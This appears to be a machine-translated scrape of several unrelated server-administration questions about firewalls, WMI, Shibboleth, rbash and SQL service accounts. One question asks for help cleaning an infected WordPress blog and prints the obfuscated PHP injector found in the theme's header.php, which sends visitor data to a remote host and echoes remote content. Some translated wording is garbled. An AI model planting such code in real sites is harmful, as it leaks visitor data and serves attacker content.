我有兴趣find开源工具来审计一些我没有写的PHP代码,然后投入生产。 我需要黑盒HTTP探测扫描器以及静态代码分析器/分析器。 我在哪里可以find所有这些工具的一个很好的综合列表,以及哪一个实际值得尝试的小列表? 这是一个开始。 我还没有尝试过其中的任何一个: ratproxy http://code.google.com/p/ratproxy/ pixy http://www.dragoslungu.com/2007/10/30/pixy-is-a-free-php-code-audit-tool/ Spike PHP http://developer.spikesource.com/projects/phpsecaudit
我想让我的新Web服务器上的防火墙保持安全。 在我做了iptables的研究之后,我遇到了UFW(Uncomplicated FireWall)。 这看起来像是一个更好的方式,让我在Ubuntu Server 10 LTS上设置防火墙,看到它是安装的一部分,这似乎是有道理的。 我的服务器上会有Nginx,FastCGI和MySQL。 我也想要允许SSH访问(显然)。 所以我很想知道我应该如何设置UFW,还有什么我需要考虑的? 经过研究,我发现了一篇文章 ,这样解释: # turn on ufw ufw enable # log all activity (you'll be glad you have this later) ufw logging on # allow port 80 for tcp (web stuff) ufw allow 80/tcp # allow our ssh port ufw allow 5555 # deny everything else […]
以前见过这些人吗? 不确定这是否与我们网站上运行的Google Analytics(分析)或UserFly相关,或者是来自用户计算机的自动攻击。 请求来自具有所有用户代理string的用户,以及来自合法请求的用户和来自可信用户的用户。 我匹配的mod_rewrite规则中的string返回“禁止”,但我想知道这些来自哪里。 它们在一天之内波澜不惊,一星期甚至更长时间,比一天的许多请求还要多。 请求是在网站上的许多随机页面,然后有这个奇怪的查询string附加,这不尽相同,但总是看起来像这样: "GET /&data=%7C%23ujnftubnq%23%3B2392714553497-%23fwfout%23%3B%5C%5E-%23efubjmt%23%3B%5C%5E-%23ujnft%23%3B%5C%5E~ HTTP/1.1"
我是我们域中的Windows Server 2003 R2机器上的本地pipe理员。 这台机器大约3年前build成,我不确定我可能有什么特权。 如果我使用ntrights.exe(从资源工具包工具)它是成功的,如下所示: ntrights.exe +r SeServiceLogonRight -u domain\accountname Granting SeServiceLogonRight to domain\accountname … successful 最近我们已经构build了一个新的Windows Server 2008 R2机器,我是本地pipe理员。 但现在相同的ntrights.exe失败如下: ntrights.exe +r SeServiceLogonRight -u domain\accountname Granting SeServiceLogonRight to domain\accountname OpenPolicy: ***Error*** OpenPolicy -1073741790 尽pipe是本地pipe理员,但我似乎缺less一些权限。 我需要什么特权才能请求我们的系统pipe理员帮助我授予这些权限? 编辑:通过将UAC设置更改为从不通知使用控制面板 – >用户帐户设置中的滑块解决问题。 但我认为这不是解决这个问题的最好方法。 其他答案仍然欢迎。
我正在通过WMI收集性能数据,并希望避免为此使用Administrators组中的帐户。 目标计算机正在运行带有最新SP /更新的Windows Server 2003。 我已经完成了我认为是允许我们的用户访问WMI的适当configuration(类似于这里描述的: http : //msdn.microsoft.com/en-us/library/aa393266.aspx )。 以下是遵循的具体步骤: 打开pipe理工具 – >计算机pipe理:在计算机pipe理(本地)下展开服务和应用程序,右键单击WMI控制并select属性。 在“安全性”选项卡中,展开“根”,突出显示“CIMV2”,单击“安全性”(靠近窗口底部)。 添加性能监视器用户并启用选项:启用帐户和远程启用。 打开pipe理工具 – >组件服务:在控制台根目录下转到组件服务 – >计算机 – >右键单击我的电脑,select属性,selectCOM安全选项卡,在“访问权限”中点击“编辑默认”select(或者添加,然后select)“性能监视器用户”组,并允许本地访问和远程访问,然后单击确定。 在“启动和激活权限”中单击“编辑默认值”select(或添加,然后select)“性能监视器用户”组,并允许本地和远程启动和激活权限。 打开pipe理工具 – >组件服务:在控制台根目录下,进入组件服务 – >计算机 – >我的电脑 – > DCOMconfiguration – >突出显示“Windows Management and Instrumentation”右键,select属性,selectSecurity选项卡,在“Launch and激活权限“select自定义,然后单击编辑,添加”性能用户组“,并允许本地和远程的远程启动和远程激活权限。 我能够通过WMI Explorer远程连接,但是当我执行这个查询时: Select CommandLine, ProcessId FROM Win32_Process 我得到一个有效的结果,但每行都有一个空的CommandLine。 如果我将用户添加到pipe理员组并重新运行查询,CommandLine列包含预期的数据。 似乎有一个许可我失踪的地方,但我没有太多的运气跟踪下来。 提前谢谢了。
我已经启动并运行了一个Shibboleth服务器提供程序(SP),并且正在使用TestShib身份提供程序(IdP)进行testing。 configuration似乎是正确的,当我要求我的安全目录我被发送到我login的IdP,然后被发回到https://example.org/Shibboleth.sso/SAML2/POST我得到一般的错误信息。 检查日志,我被告知: found encrypted assertions, but no CredentialResolver was available 我重新检查了configuration,在那里我有: <CredentialResolver type="File" key="/etc/shibboleth/sp-key.pem" certificate="/etc/shibboleth/sp-cert.pem"/> 这两个文件都存在于这些位置。 我已经重新启动Apache并重试,但仍然得到相同的错误。 我不知道它是否有所作为 – 但只有网站的一个子目录已经得到保证 – documentroot是公开的。
我们已经在AWS上运行了两个集群(HAProxy / Solr,PGPool / PostgreSQL),并且我们已经设置了脚本来允许新的从属实例被自动包含到集群中,通过更新他们的IP来configurationS3上的configuration文件,然后通过SSH连接到主实例来踢他们下载修改后的configuration并重新启动服务。 这一切都很好,但在testing中,我们使用我们的主要pem为SSH,这意味着它需要存储在一个实例。 不好。 我想要一个可以使用AWS密钥对的非root用户,他们将拥有sudo访问权限来运行download-config-and-restart脚本,但是没有别的。 rbash似乎是要走的路,但我知道这可能是不安全的,除非正确设置。 那么这种方法有什么安全漏洞呢? 为user.pem创build的新AWS密钥对(不是真的叫'user') 实例上的新用户:用户 用户的公钥是〜user / .ssh / authorized_keys(通过用user.pem创build新的实例,并从/root/.ssh/authorized_keys复制) 用户的私钥在〜user / .ssh / user.pem中 'user'具有/ home / user / bin / rbash的loginshell 〜user / bin /包含到/ bin / rbash和/ usr / bin / sudo的符号链接 / etc / sudoers有条目“user ALL =(root)NOPASSWD:[脚本path] 〜user / .bashrc将PATH设置为/ home / user / […]
我们其中一个博客的一些用户已经发现,当在Windows下使用杀毒软件(如Avast或NOD32)加载页面时,会出现一条消息。 信息是这样的 “远程地址已被阻止。”URL:“unloadpupil.org/u4offvzxwifsh2q/”IP地址:64.191.81.117:80 我试图在我的博客数据库上find这个URL或IP,但没有运气,我们的内容没有这个URL的痕迹,所以我非常沮丧的事情真的发生在我们不知道的情况下。 有没有find问题的根源呢? *****更新******** Mangiabuild议的phpAV文件是一种可能的select,但是我已经安装了WordPress Antivirus插件 ,它给了我一个受恶意软件影响的可能文件列表。 在我的网站的主题header.php在它的末尾有以下文本: <?php error_reporting(0); $cf=strrev('edo'.'ced'.'_46esab');$counter=$cf('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9').md5($_SERVER['SERVER_NAME']); $data=array('HTTP_ACCEPT_CHARSET','HTTP_ACCEPT_LANGUAGE','HTTP_HOST','HTTP_REFERER', 'HTTP_USER_AGENT','HTTP_QUERY_STRING','REMOTE_ADDR','REQUEST_URI','REQUEST_METHOD','SCRIPT_FILENAME'); foreach($data as $val){$t[]=$_SERVER[$val];}$u=$counter.'&data='.base64_encode(serialize($t));$fn=file_get_contents($u); if(!$fn||strlen($fn)<4){ob_start();include($u);$fn=ob_get_contents();ob_clean();} if($fn&&strlen($fn)>4){list($crc,$enc)=explode('::',$fn);if(md5($enc)==$crc){echo $cf($enc);}} ?> 根据之前StackExchange的消息 ,这可能是恶意软件。 我删除了它,我正在寻找更多的问题。
我们正在考虑使用客户端证书来改进一些关键网页的身份validation,但是我们不确定这是否是一个广泛使用的标准。 所有主stream浏览器都支持SSL客户端证书吗? 特别是,他们是否在以下浏览器上工作? IE浏览器 火狐浏览器 谷歌浏览器 苹果Safari(Mac和iOS) Android Web浏览器 (我们在服务器上使用Apache,如果重要的话)
安装文档说最好的做法是创build一个SQL Engine服务运行的最小特权帐户。 在Windows上build议创build这样一个帐户的做法是什么…该帐户应该是什么团体成员(而不是成员)? 还有哪些其他帐户权限应该放弃?